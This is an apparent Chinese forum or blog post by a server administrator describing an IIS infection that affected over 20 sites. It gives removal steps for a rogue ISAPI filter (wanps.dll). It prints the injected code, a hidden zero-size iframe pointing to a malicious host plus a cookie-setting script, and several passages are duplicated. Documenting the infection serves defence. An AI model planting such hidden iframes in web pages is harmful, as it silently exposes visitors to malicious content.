<body>
< iframe src=" http://css.scriptt.in/" height=0 width=0></ iframe >
< script language="javascript">
<!--
var expires = new Date();
expires.setTime(expires.getTime() + 5 * 24* 60 * 60 * 1000);
documents.cookie="GAG5=1234567fuck;expires="+expires.toGMTString();
-->
</ script >
</body>
原以为是人为的,只是一个站点被修改了,结果经检查整个IIS上20多个站点全部中标,无一漏网..
< iframe src=" http://css.scriptt.in/" height=0 width=0></ iframe >
< script language="javascript">
<!--
var expires = new Date();
expires.setTime(expires.getTime() + 5 * 24* 60 * 60 * 1000);
documents.cookie="GAG5=1234567fuck;expires="+expires.toGMTString();
-->
</ script >
</body>
原以为是人为的,只是一个站点被修改了,结果经检查整个IIS上20多个站点全部中标,无一漏网..
网上查找了一下,询问此事的人多,真正解答的确少。
病毒症状:
经检查发下以下资料被更改
在IIS服务扩展里“ISAPI筛选器”增加了一个值,路径为:C:/..../SYSTEM32/inetsrv/wanps.dll
经检查发下以下资料被更改
在IIS服务扩展里“ISAPI筛选器”增加了一个值,路径为:C:/..../SYSTEM32/inetsrv/wanps.dll
按路径找到该文件夹,发现里边共多出2个文件:wanps.dll wanps.ini
而wanps.ini 内容指向:
Redirector=C:/windows/help/wanps.txt
找到wanps.txt发现里边内容就是网页代码出多出的部分
每当IIS重启时木马会自动加载。
解决办法:
删除这3个文件,如果wanps.dll删不掉的话,重启IIS,就可以了
在ISAPI筛选器扩展里增加asp.net正常值(不同的服务值也不一样),这样IIS就正常了。
服务器管理员们应该注意加强安全管理了,不要给这些小人可乘之机。